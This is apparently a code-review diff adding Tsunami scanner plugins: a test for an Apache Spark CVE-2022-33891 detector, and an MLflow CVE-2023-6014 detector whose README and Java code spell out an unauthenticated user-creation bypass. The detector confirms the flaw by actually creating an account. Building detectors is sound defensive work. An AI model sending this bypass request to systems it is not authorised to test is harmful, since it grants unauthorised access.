+++ b/community/detectors/apache_spark_cve_2022_33891/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202233891/Cve202233891DetectorWithoutCallbackServerTest.java
@@ -0,0 +1,145 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202233891;
+
+import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+import static java.util.concurrent.TimeUnit.SECONDS;
+
+import com.google.common.collect.ImmutableList;
+import com.google.inject.Guice;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.common.time.testing.FakeUtcClock;
+import com.google.tsunami.common.time.testing.FakeUtcClockModule;
+import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.Software;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.TransportProtocol;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.time.Instant;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.MockResponse;
+import okhttp3.mockwebserver.MockWebServer;
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+
+/** Unit tests for {@link Cve202233891VulnDetector}. */
+@RunWith(JUnit4.class)
+public class Cve202233891DetectorWithoutCallbackServerTest {
+ private final FakeUtcClock fakeUtcClock =
+ FakeUtcClock.create().setNow(Instant.parse("2022-05-23T00:00:00.00Z"));
+ private MockWebServer mockWebServer;
+ private NetworkService service;
+ private TargetInfo targetInfo;
+
+ @Inject private Cve202233891VulnDetector detector;
+
+ @Before
+ public void setUp() throws IOException {
+ mockWebServer = new MockWebServer();
+
+ Guice.createInjector(
+ new FakeUtcClockModule(fakeUtcClock),
+ new HttpClientModule.Builder().build(),
+ FakePayloadGeneratorModule.builder().build(),
+ new Cve202233891DetectorBootstrapModule())
+ .injectMembers(this);
+
+ service =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setTransportProtocol(TransportProtocol.TCP)
+ .setSoftware(Software.newBuilder().setName("http"))
+ .setServiceName("http")
+ .build();
+
+ targetInfo =
+ TargetInfo.newBuilder()
+ .addNetworkEndpoints(forHostname(mockWebServer.getHostName()))
+ .build();
+ }
+
+ @After
+ public void tearDown() throws IOException {
+ mockWebServer.shutdown();
+ }
+
+ @Test
+ public void detect_whenVulnerable_returnsVulnerability() throws Exception {
+ // It is a blind RCE, body is not important. This is a part of a valid response.
+ mockWebServer.enqueue(
+ new MockResponse()
+ .setBodyDelay(5, SECONDS)
+ .setResponseCode(403)
+ .setBody(
+ "SERVLET:org.apache.spark.ui.JettyUtils$$anon$1-7439513f\n"));
+
+ DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
+
+ assertThat(detectionReports.getDetectionReportsList())
+ .containsExactly(
+ DetectionReport.newBuilder()
+ .setTargetInfo(targetInfo)
+ .setNetworkService(service)
+ .setDetectionTimestamp(
+ Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli()))
+ .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+ .setVulnerability(
+ Vulnerability.newBuilder()
+ .setMainId(
+ VulnerabilityId.newBuilder()
+ .setPublisher("TSUNAMI_COMMUNITY")
+ .setValue("CVE_2022_33891"))
+ .setSeverity(Severity.CRITICAL)
+ .setTitle("CVE-2022-33891 Apache Spark UI RCE")
+ .setRecommendation(
+ "You can upgrade your Spark instances to 3.2.2, or 3.3.0 or later")
+ .setDescription(
+ "The Apache Spark UI has spark.acls.enable configuration option which"
+ + " provides capability to modify the application according to"
+ + " user's permissions. When the config is true, the vulnerable"
+ + " versions of Spark checks the group membership of the user"
+ + " without proper controls, that results in blind command"
+ + " injection in username parameter."))
+ .build());
+ assertThat(mockWebServer.getRequestCount()).isEqualTo(1);
+ }
+
+ @Test
+ public void detect_ifNotVulnerable_doesNotReportVuln() throws IOException {
+ mockWebServer.enqueue(
+ new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody("Hello world!"));
+
+ DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
+ assertThat(detectionReports.getDetectionReportsList()).isEmpty();
+ assertThat(mockWebServer.getRequestCount()).isEqualTo(1);
+ }
+}
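Review bot: Neither test covers the false-positive case a timing-based check is most exposed to: a prompt 403 from a Spark UI that has ACLs enabled but is already patched, which is exactly the response body the vulnerable-case test enqueues minus its `setBodyDelay(5, SECONDS)`. If the detector keys on response latency (the 5 s delay suggests so; the detector source is not part of this change), a third test that enqueues the same 403 without a delay and asserts `getDetectionReportsList()` is empty pins that a plain ACL denial is not reported as RCE. The 5 s real sleep also runs on every suite execution while the fake clock stays frozen; if the detector's threshold is configurable, a shorter delay would keep the test both meaningful and fast.
```java
// … unchanged: existing tests …

@Test
public void detect_when403WithoutDelay_doesNotReportVuln() throws IOException {
  mockWebServer.enqueue(
      new MockResponse()
          .setResponseCode(403)
          .setBody("SERVLET:org.apache.spark.ui.JettyUtils$$anon$1-7439513f\n"));

  DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service));
  assertThat(detectionReports.getDetectionReportsList()).isEmpty();
  assertThat(mockWebServer.getRequestCount()).isEqualTo(1);
}
```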
diff --git a/community/detectors/mlflow_cve_2023_6014/README.md b/community/detectors/mlflow_cve_2023_6014/README.md
new file mode 100644
index 000000000..38844bb9e
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/README.md
@@ -0,0 +1,24 @@
+# MLflow CVE-2023-6014 Auth Bypass Vulnerability Detector
+
+This detector checks for MLflow CVE-2023-6014 Auth Bypass vulnerability.
+
+MLflow instances below version 2.8.0 which use MLFlow UI or MLFlow Server have
+an authentication bypass vulnerability. Normally MLFlow requires authentication
+for user creation operations who are served under /mlflow/users/create API.
+However, due to a coding mistake, prepending /api/2.0/ to those routes will
+allow access to an unauthenticated remote attacker in the vulnerable versions,
+namely /api/2.0/mlflow/users/create. Therefore, unauthenticated attackers can
+create users by using this endpoint and reach the functionalities of MLflow.
+
+- https://huntr.com/bounties/3e64df69-ddc2-463e-9809-d07c24dc1de4
+- https://nvd.nist.gov/vuln/detail/CVE-2023-6014
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+Tsunami identifiable jar file is located at `build/libs` directory.
diff --git a/community/detectors/mlflow_cve_2023_6014/build.gradle b/community/detectors/mlflow_cve_2023_6014/build.gradle
new file mode 100644
index 000000000..260b8e74c
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/build.gradle
@@ -0,0 +1,68 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami CVE-2023-6014 VulnDetector plugin.'
+group 'com.google.tsunami'
+version '0.0.1-SNAPSHOT'
+
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ okhttpVersion = '3.12.0'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+}
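Review bot: `tsunamiVersion = 'latest.release'` resolves the three `com.google.tsunami` dependencies to whatever is newest at build time, so the plugin jar is not reproducible and a breaking or compromised upstream release flows straight into this build; pinning a released version (`tsunamiVersion = '<pinned-version>'`) and bumping it deliberately keeps the supply chain auditable. This mirrors the other community plugins, so it may be a repo-wide decision rather than one for this change alone. Separately, `javadoc.options` links to the Java 8 API docs while `sourceCompatibility` targets Java 11, which makes generated javadoc links point at the wrong library version.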
diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 000000000..e6441136f
Binary files /dev/null and b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties
new file mode 100644
index 000000000..b82aa23a4
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties
@@ -0,0 +1,7 @@
+distributionBase=GRADLE_USER_HOME
+distributionPath=wrapper/dists
+distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip
+networkTimeout=10000
+validateDistributionUrl=true
+zipStoreBase=GRADLE_USER_HOME
+zipStorePath=wrapper/dists
diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew b/community/detectors/mlflow_cve_2023_6014/gradlew
new file mode 100755
index 000000000..1aa94a426
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/gradlew
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew.bat b/community/detectors/mlflow_cve_2023_6014/gradlew.bat new file mode 100644 index 000000000..25da30dbd --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/gradlew.bat 
@@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 
1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/mlflow_cve_2023_6014/settings.gradle b/community/detectors/mlflow_cve_2023_6014/settings.gradle new file mode 100644 index 000000000..6240035f5 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'CVE-2023-6014' diff --git a/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java new file mode 100644 index 000000000..f60be8300 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014DetectorBootstrapModule.java 
@@ -0,0 +1,26 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve20236014;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** An CVE-2023-6014 Guice module that bootstraps the {@link Cve20236014VulnDetector}. */
+public class Cve20236014DetectorBootstrapModule extends PluginBootstrapModule {
+ @Override
+ protected void configurePlugin() {
+ registerPlugin(Cve20236014VulnDetector.class);
+ }
+}
diff --git a/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java
new file mode 100644
index 000000000..b31ee09f0
--- /dev/null
+++ b/community/detectors/mlflow_cve_2023_6014/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236014/Cve20236014VulnDetector.java
@@ -0,0 +1,179 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve20236014;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableList.toImmutableList;
+import static com.google.common.net.HttpHeaders.CONTENT_TYPE;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.toUriAuthority;
+import static com.google.tsunami.common.net.http.HttpRequest.post;
+
+import com.google.common.annotations.VisibleForTesting;
+import com.google.common.collect.ImmutableList;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.ByteString;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.security.SecureRandom;
+import java.time.Clock;
+import java.time.Instant;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects the CVE-2023-6014 vulnerability. */
+@PluginInfo(
+ type = PluginType.VULN_DETECTION,
+ name = "CVE20236014VulnDetector",
+ version = "0.1",
+ description = Cve20236014VulnDetector.VULN_DESCRIPTION,
+ author = "frkngksl",
+ bootstrapModule = Cve20236014DetectorBootstrapModule.class)
+public final class Cve20236014VulnDetector implements VulnDetector {
+ private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+ private static final String VUL_PATH = "api/2.0/mlflow/users/create";
+ @VisibleForTesting static final String DETECTION_STRING = "Successfully signed up user:";
+
+ @VisibleForTesting
+ static final String VULN_DESCRIPTION =
+ "On MLflow versions prior to 2.8.0, unauthenticated users are able to arbitrarily create an"
+ + " account in MLflow server or MLflow UI by bypassing any authentication requirement.\n";
+
+ private final HttpClient httpClient;
+ private final Clock utcClock;
+
+ private static final String ALPHA_NUMERIC_STRING = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+ private static final SecureRandom secureRandom = new SecureRandom();
+
+ public static String GenerateRandomString(int length) {
+ StringBuilder builder = new StringBuilder();
+ for (int i = 0; i < length; i++) {
+ int index = secureRandom.nextInt(ALPHA_NUMERIC_STRING.length());
+ builder.append(ALPHA_NUMERIC_STRING.charAt(index));
+ }
+ return builder.toString();
+ }
+
+ @Inject
+ Cve20236014VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient) {
+ this.httpClient = checkNotNull(httpClient);
+ this.utcClock = checkNotNull(utcClock);
+ }
+
+ private static boolean isWebServiceOrUnknownService(NetworkService networkService) {
+ return networkService.getServiceName().isEmpty()
+ || NetworkServiceUtils.isWebService(networkService)
+ || NetworkServiceUtils.getServiceName(networkService).equals("unknown");
+ }
+
+ private static StringBuilder buildTarget(NetworkService networkService) {
+ StringBuilder targetUrlBuilder = new StringBuilder();
+ if (NetworkServiceUtils.isWebService(networkService)) {
+ targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService));
+ } else {
+ targetUrlBuilder
+ .append("https://")
+ .append(toUriAuthority(networkService.getNetworkEndpoint()))
+ .append("/");
+ }
+ return targetUrlBuilder;
+ }
+
+ @Override
+ public DetectionReportList detect(
+ TargetInfo targetInfo, ImmutableList matchedServices) {
+ logger.atInfo().log("CVE-2023-6014 starts detecting.");
+
+ return DetectionReportList.newBuilder()
+ .addAllDetectionReports(
+ matchedServices.stream()
+ .filter(Cve20236014VulnDetector::isWebServiceOrUnknownService)
+ .filter(this::isServiceVulnerable)
+ .map(networkService -> buildDetectionReport(targetInfo, networkService))
+ .collect(toImmutableList()))
+ .build();
+ }
+
+ private boolean isServiceVulnerable(NetworkService networkService) {
+ String targetVulnerabilityUrl = buildTarget(networkService).append(VUL_PATH).toString();
+ try {
+ String randomUsername = GenerateRandomString(10);
+ String randomPassword = GenerateRandomString(10);
+
+ logger.atInfo().log("Attempting to create a user (%s: %s)", randomUsername, randomPassword);
+ String stringPayload = "username=" + randomUsername + "&password=" + randomPassword;
+ ByteString bytePayload = ByteString.copyFromUtf8(stringPayload);
+ HttpResponse httpResponse =
+ httpClient.send(
+ post(targetVulnerabilityUrl)
+ .setHeaders(
+ HttpHeaders.builder()
+ .addHeader(CONTENT_TYPE, "application/x-www-form-urlencoded")
+ .build())
+ .setRequestBody(bytePayload)
+ .build(),
+ networkService);
+ logger.atInfo().log("Response: %s", httpResponse.bodyString().get());
+ if (httpResponse.status().code() == 200
+ && httpResponse.bodyString().get().contains(DETECTION_STRING)) {
+ return true;
+ }
+ } catch (IOException | AssertionError e) {
+ logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
+ return false;
+ }
+ return false;
+ }
+
+ private DetectionReport buildDetectionReport(
+ TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+ return DetectionReport.newBuilder()
+ .setTargetInfo(targetInfo)
+ .setNetworkService(vulnerableNetworkService)
+ .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+ .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+ .setVulnerability(
+ Vulnerability.newBuilder()
+ .setMainId(
+ VulnerabilityId.newBuilder()
+ .setPublisher("TSUNAMI_COMMUNITY")
+ .setValue("CVE_2023_6014"))
+ .setSeverity(Severity.CRITICAL)
+ .setTitle("CVE-2023-6014 MLflow Auth Bypasss Vulnerability")
+ .setRecommendation(
